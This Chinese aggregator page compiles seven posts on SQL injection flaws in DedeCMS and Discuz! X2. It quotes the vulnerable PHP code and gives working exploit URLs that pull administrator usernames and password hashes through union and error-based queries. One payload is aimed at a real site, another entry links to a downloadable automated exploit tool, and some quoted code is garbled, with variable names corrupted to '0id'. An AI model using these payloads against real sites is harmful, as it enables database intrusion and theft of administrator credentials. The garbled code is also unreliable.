DedeCMS会员中心书签管理SQL注射漏洞漏洞预警

“XLTOOL”通过精心收集，向本站投稿了7篇DedeCMS会员中心书签管理SQL注射漏洞漏洞预警，下面小编为大家带来整理后的DedeCMS会员中心书签管理SQL注射漏洞漏洞预警，希望大家能够受用!

篇1：DedeCMS会员中心书签管理SQL注射漏洞漏洞预警

严重鄙视乱改内容的网站.

DedeCMS会员中心SQL注射漏洞

需要magic_quotes_gpc = Off

会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.

DedeCMS会员中心书签管理SQL注射漏洞

成功利用该漏洞可获得管理员密码

会员登录后可以执行SQL语句查询数据库任意内容如管理员密码

bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r

篇2：DedeCMS会员中心短消息SQL注射0day漏洞漏洞预警

需要:magic_quotes_gpc = Off

DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等

看到微博上有人提了下,偶也发鸡肋了.

bt/de/member/pm.php?dopost=read&id=1%27%20and%20@%60%27%60%20and%20%28SELECT%201%20FROM%20%28select%20count%28

​

篇3：DedeCMS会员中心短消息SQL注射0day漏洞

需要:magic_quotes_gpc = Off

DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等

看到微博上有人提了下,偶也发鸡肋了.

/de/member/pm.php?dopost=read&id=1%27%20and%20@%60%27%60%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27

篇4：DedeCMS SQL注射漏洞利用工具

DedeCMS SQL Injection Exploit

1.小工具适用于最新dedecms SQL注射漏洞

2.有狗或其他安全工具下或许会没有效果

3.dedecms系统的管理员密码MD5为20位 去掉前三和后一 为16位MD5

4.少数杀软报毒，属正常，若他处下载，请避免捆马现象！！

5.测试使用，勿作非法用途~~

傻瓜式操作，是人都会用~~

下载地址： pan.baidu.com/s/1c0Fy2vY

篇5：dedecms(plus/feedbackjs.php)注射漏洞漏洞预警

发现者:Rainy'Fox&St0p

Team:二胖子网安(bbs.erpangzi.com)

影响版本:

dedecms GBK 5.1

漏洞描述:

文件:plus/feedback_js.php

if(empty($arcID))

{

$row = $dlist->dsql->GetOne(“Select id From `#@__cache_feedbackurl` where url='$arcurl' ”);

if(is_array($row)) $urlindex = $row['id'];

}

获得变量arcurl,直接放入数据库查询.导致注入产生,介于对于php环境如果设置了magic_quote_gpc=on的问题.可以结合php多字节编码漏洞构造.

利用:

localhost/plus/feedback_js.php?arcurl=%cf' union select “' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback d where 1=2  and ''='” from dede_admin where ''='

经过测试,得出结论,magic_quotes_gpc = On的时候目前语句还不行,编码尚未突破

演示:

www.yxwo.cn/plus/feedback_js.php?arcurl=%cf'%20union%20select%20“'%20and%201=2%20union%20select%201,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1%20as%20msg%20from%20yxwodede_admin%20where%201=1%20union%20select%20*%20from%20yxwodede_feedback%20d%20where%201=2%20%20and%20''='”%20from%20yxwodede_admin%20where%20''='

篇6：Discuz! X2 SQL注射漏洞漏洞预警

详细说明：

文件：source\module\forum\forum_attachment.php

if(!defined('IN_DISCUZ')) {

exit('Access Denied');

}

define('NOROBOT', TRUE);

@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|', base64_decode($_G['gp_aid']));

if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first(“SELECT pid, tid FROM ”.DB::table('forum_attachment').“ WHERE aid='$_G[gp_aid]'”))) {

dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach['tid']);

}

变量aid 直接base64_decode 后传入 SQL查询，造成注射漏洞，

Discuz! X2 SQL注射漏洞漏洞预警

，

。。

www.xxxx.net/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D

转向后网址

www.xxxx.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member

暴出表名 pre_common_admincp_member

实际查询为：

$x=“1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database and TABLE_NAME like '%_member|x|x|x|x”;

//die (urlencode(base64_encode($x)));

篇7：DedeCms V57 plus/search.php文件SQL注射漏洞预警

微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.

作者: c4rp3nt3r@0x50sec.org

Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.

黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.

============

Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.

require_once(dirname(__FILE__).”/../include/common.inc.php”);

require_once(DEDEINC.”/arc.searchview.class.php”);

$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;

0id = (isset(0id) && is_numeric(0id)) ? 0id : 0;

$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;

$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;

$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;

if(!isset($orderby)) $orderby=”;

else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);

if(!isset($searchtype)) $searchtype = ‘titlekeyword’;

else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);

if(!isset($keyword)){

if(!isset($q)) $q = ”;

$keyword=$q;

}

$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));

//查找栏目信息

if(empty(0id))

{

0nameCacheFile = DEDEDATA.’/cache/typename.inc’;

if(!file_exists(0nameCacheFile) || filemtime(0nameCacheFile) < time()-(3600*24) )

{

$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);

fwrite($fp, “<”.”?php\r\n”);

$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);

$dsql->Execute();

while($row = $dsql->GetArray())

{

fwrite($fp, “\0Arr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);

}

fwrite($fp, ‘?’.'>’);

fclose($fp);

}

//引入栏目缓存并看关键字是否有相关栏目内容

require_once(0nameCacheFile);

//0Arr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个

//

if(isset(0Arr) && is_array(0Arr))

{

foreach(0Arr as $id=>0name)

{

$keywordn = str_replace(0name, ‘ ‘, $keyword); //这个地方要绕过

if($keyword != $keywordn)

{

$keyword = $keywordn;

0id = $id; // 这里存在变量覆盖漏洞使 0id = (isset(0id) && is_numeric(0id)) ? 0id : 0; 这句过滤成了摆设

break;

}

}

}

}

然后plus/search.php文件下面定义了一个 Search类的对象 .

在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.

$this->TypeLink = new TypeLink(0id);

TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.

class TypeLink

{

var 0Dir;

var $dsql;

var $TypeID;

var $baseDir;

var $modDir;

var $indexUrl;

var $indexName;

var $TypeInfos;

var $SplitSymbol;

var $valuePosition;

var $valuePositionName;

var $OptionArrayList;

//构造函数///////

//php5构造函数

function __construct(0id)

{

$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];

$this->indexName = $GLOBALS['cfg_indexname'];

$this->baseDir = $GLOBALS['cfg_basedir'];

$this->modDir = $GLOBALS['cfg_templets_dir'];

$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];

$this->dsql = $GLOBALS['dsql'];

$this->TypeID = 0id;

$this->valuePosition = ”;

$this->valuePositionName = ”;

$this->typeDir = ”;

$this->OptionArrayList = ”;

//载入类目信息

$query = “SELECT tp.*,ch.typename as

ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join

`#@__channeltype` ch

on ch.id=tp.channeltype WHERE tp.id=’0id’ “; //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿

if(0id >0)

{

$this->TypeInfos = $this->dsql->GetOne($query);

利用代码一 需要 即使magic_quotes_gpc = Off

www.myhack58.com /plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title

这只是其中一个利用代码… Search 类的构造函数再往下

……省略

$this->TypeID = 0id;

……省略

if($this->TypeID==”0″){

$this->ChannelTypeid=1;

}else{

$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲

//现在不鸡肋了吧亲…

$this->ChannelTypeid=$row['channeltype'];

}

利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.

www.myhack58.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title

如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站

【DedeCMS会员中心书签管理SQL注射漏洞漏洞预警】相关文章：

1.马克斯CMS2.0beta (maxcms)SQL注入漏洞解析漏洞预警

2.Nginx 安全漏洞 (CVE4547)漏洞预警

3.毕业论文选题系统上传漏洞漏洞预警

4.CVE0497 漏洞利用学习笔记漏洞预警

5.网马解密初级篇漏洞预警

6.COCOON Counter统计程序漏洞总结漏洞预警

7.EFront 3.6.9 社区版多个漏洞漏洞预警

8.天下马ASP收信程序漏洞漏洞预警

9.bug漏洞处理机制系统bugtracker漏洞预警

10.Nginx解析漏洞原理及其利用方法漏洞预警